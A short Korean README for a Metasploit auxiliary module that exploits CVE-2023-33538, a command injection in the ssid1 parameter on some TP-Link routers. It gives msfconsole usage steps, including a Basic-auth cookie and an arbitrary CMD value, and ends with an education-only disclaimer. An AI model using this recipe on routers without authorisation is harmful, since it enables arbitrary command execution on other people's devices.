
CVE-2023-33538 - TP-Link 명령어 삽입 Ruby 모듈 (Metasploit Framework용)
이 Metasploit 보조 모듈은 TP-Link TL-WR940N V2/V4 및 TL-WR841N V8/V10 라우터의 인증된 명령 주입 취약점을 대상으로 합니다.
문제는 WlanNetworkRpm.htm에서 사용되는 취약한 ssid1 매개변수에 있으며, 이를 통해 임의의 셸 명령을 주입할 수 있습니다.
성공 시, 공격자는 장치에서 임의의 명령을 실행할 수 있습니다.
CVE에 대한 자세한 정보:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb 파일을 Metasploit 모듈 폴더에 복사합니다. 예:cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
이 모듈은 인증을 수행하지 않습니다. 라우터 웹 인터페이스에 성공적으로 로그인한 후
Authorization쿠키와 세션 접두사를 수동으로 추출해야 합니다.
이 모듈은 교육 목적으로만 제공됩니다.
소유하지 않거나 테스트할 명시적 허가가 없는 장치나 인프라에 이 코드를 사용하지 마십시오.
버그를 발견하거나 개선 아이디어가 있으면 언제든지 이슈를 열거나 댓글을 남겨주세요.